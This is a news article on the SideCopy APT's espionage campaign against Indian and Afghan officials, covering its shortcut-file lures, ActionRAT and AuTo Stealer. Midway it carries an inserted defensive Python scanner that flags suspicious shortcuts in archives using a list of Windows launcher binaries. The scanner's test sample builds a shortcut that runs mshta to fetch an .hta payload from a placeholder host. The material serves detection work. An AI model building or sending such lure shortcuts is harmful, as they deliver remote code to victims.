Indian and Afghan government officials are being targeted by Pakistani hackers in a campaign built to steal Google, Twitter, and Facebook credentials and quietly take over the officials' accounts, The Hacker News reports.
“Malwarebytes’ recent findings go into depth regarding the new techniques and tools utilized by the APT group known as SideCopy,” according to the portal, “which is so named because it attempts to mimic the infection chains linked with another gang tracked as SideWinder and mislead attribution.”
Malwarebytes researcher Hossein Jazi says the lures used by SideCopy APT are usually archive files containing an embedded LNK shortcut, a Microsoft Publisher document, or a trojanized application. The embedded files are tailored to government and military officials in Afghanistan and India.
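The archive-with-embedded-LNK lure described above can be triaged without opening anything on a Windows box: unpack the archive, find every shortcut, and read what the shortcut actually launches from the Shell Link Binary File Format's StringData fields. The script below is an added example written for this page, not code from Malwarebytes or the article. It parses only the StringData section of an LNK (skipping the optional IDList and LinkInfo blocks), flags shortcuts that hide behind a double extension or launch a living-off-the-land binary, and runs over a constructed sample archive. The use of mshta and an .hta payload in the sample, the indicator list, and the hostname lure.example.invalid are assumptions for illustration, not details taken from the page.

```python
"""Triage a ZIP archive for Windows shortcut (.lnk) lures.
Added example for this page; not from Malwarebytes or the article."""
import io
import struct
import zipfile

# LinkFlags bits defined in MS-SHLLINK (Shell Link Binary File Format)
HAS_ID_LIST = 0x0001
HAS_LINK_INFO = 0x0002
HAS_NAME = 0x0004
HAS_RELATIVE_PATH = 0x0008
HAS_WORKING_DIR = 0x0010
HAS_ARGUMENTS = 0x0020
HAS_ICON_LOCATION = 0x0040
IS_UNICODE = 0x0080
LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")

# LOLBins and payload types commonly launched from LNK lures (assumed indicator list)
SUSPICIOUS = ("mshta", "powershell", "cmd.exe", "cmd /c", "wscript", "cscript",
              "rundll32", "regsvr32", ".hta")


def parse_lnk(data: bytes) -> dict:
    """Return the StringData fields of a shortcut: name, relative_path, working_dir, arguments, icon."""
    if len(data) < 76 or struct.unpack_from("<I", data, 0)[0] != 0x4C or data[4:20] != LNK_CLSID:
        raise ValueError("not a shell link")
    flags = struct.unpack_from("<I", data, 20)[0]
    pos = 76                                   # fixed-size ShellLinkHeader
    if flags & HAS_ID_LIST:                    # LinkTargetIDList: 2-byte size + items
        pos += 2 + struct.unpack_from("<H", data, pos)[0]
    if flags & HAS_LINK_INFO:                  # LinkInfo: size field includes itself
        pos += struct.unpack_from("<I", data, pos)[0]
    fields = {}
    for flag, key in ((HAS_NAME, "name"), (HAS_RELATIVE_PATH, "relative_path"),
                      (HAS_WORKING_DIR, "working_dir"), (HAS_ARGUMENTS, "arguments"),
                      (HAS_ICON_LOCATION, "icon")):
        if not flags & flag:
            continue
        count = struct.unpack_from("<H", data, pos)[0]   # CountCharacters, no terminator
        pos += 2
        if flags & IS_UNICODE:
            fields[key] = data[pos:pos + 2 * count].decode("utf-16-le", errors="replace")
            pos += 2 * count
        else:
            fields[key] = data[pos:pos + count].decode("cp1252", errors="replace")
            pos += count
    return fields


def scan_archive(zip_bytes: bytes) -> list:
    """Return a finding per suspicious .lnk entry: entry name, reconstructed command line, reasons."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for info in zf.infolist():
            if not info.filename.lower().endswith(".lnk"):
                continue
            try:
                fields = parse_lnk(zf.read(info))
            except ValueError as exc:
                findings.append({"entry": info.filename, "reasons": [str(exc)]})
                continue
            cmdline = " ".join(fields.get(k, "") for k in ("relative_path", "arguments")).lower()
            reasons = []
            if info.filename.lower().count(".") > 1:
                reasons.append("double extension disguises shortcut as a document")
            hits = [t for t in SUSPICIOUS if t in cmdline]
            if hits:
                reasons.append("launches " + ", ".join(hits))
            if reasons:
                findings.append({"entry": info.filename, "command": cmdline, "reasons": reasons})
    return findings


def build_lnk(relative_path: str, arguments: str) -> bytes:
    """Build a minimal Unicode shortcut (constructed sample, only for exercising the scanner)."""
    flags = HAS_RELATIVE_PATH | HAS_ARGUMENTS | IS_UNICODE
    header = struct.pack("<I16sI", 0x4C, LNK_CLSID, flags) + bytes(76 - 24)  # remaining header fields zeroed
    body = b""
    for s in (relative_path, arguments):
        body += struct.pack("<H", len(s)) + s.encode("utf-16-le")
    return header + body


def build_sample_archive() -> bytes:
    """Constructed archive: one lure-style shortcut, one benign shortcut, one text file."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("Tender_Notice.pdf.lnk",
                    build_lnk(r"..\..\..\Windows\System32\mshta.exe",
                              "http://lure.example.invalid/notice.hta"))  # assumed payload chain
        zf.writestr("Manual.lnk", build_lnk(r"Manual.pdf", ""))
        zf.writestr("README.txt", "benign text file\n")
    return buf.getvalue()


if __name__ == "__main__":
    for finding in scan_archive(build_sample_archive()):
        print(finding)
```

Because the check reads the shortcut's own metadata rather than executing it, it can run inside a mail gateway or a sandbox intake step; the double-extension test catches the common "Document.pdf.lnk" disguise even when the launched command is obfuscated enough to miss the indicator list.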
The discovery is significant in light of Meta's recent disclosure that it had disrupted the group's activity on its platforms, where the actors used romantic lures to compromise individuals with ties to the Afghan government, military, and law enforcement in Kabul. Afghan officials linked with the Administration Office of the President (AOP), as well as the Ministries of Foreign Affairs and Finance and the National Procurement Authority, have been targeted in a number of high-profile attacks. The actor also took several Microsoft Office documents from the Afghan government's website, including documents about identity cards, visas, and asset registrations, as well as the names, phone numbers, and email addresses of officials.

In the cyber-espionage campaigns observed by Malwarebytes, opening the lure document triggers a loader that drops a next-stage remote access trojan known as ActionRAT, which can upload files, execute commands from the attacker, and more. The loader also drops a new information stealer, AuTo Stealer, which collects Microsoft Office files, PDFs, text files, database files, and images and sends them to a remote server over HTTP or TCP.
SideCopy APT's tactics are not new. In September 2020, the cybersecurity firm Quick Heal disclosed an espionage campaign that had targeted Indian defense units and armed forces personnel since at least 2019.
In July, Cisco Talos researchers detailed the group's growing set of infection chains delivering bespoke and commodity remote access trojans such as CetaRAT, Allakore, and njRAT, as part of what they described as an expansion of its malware campaigns against Indian companies.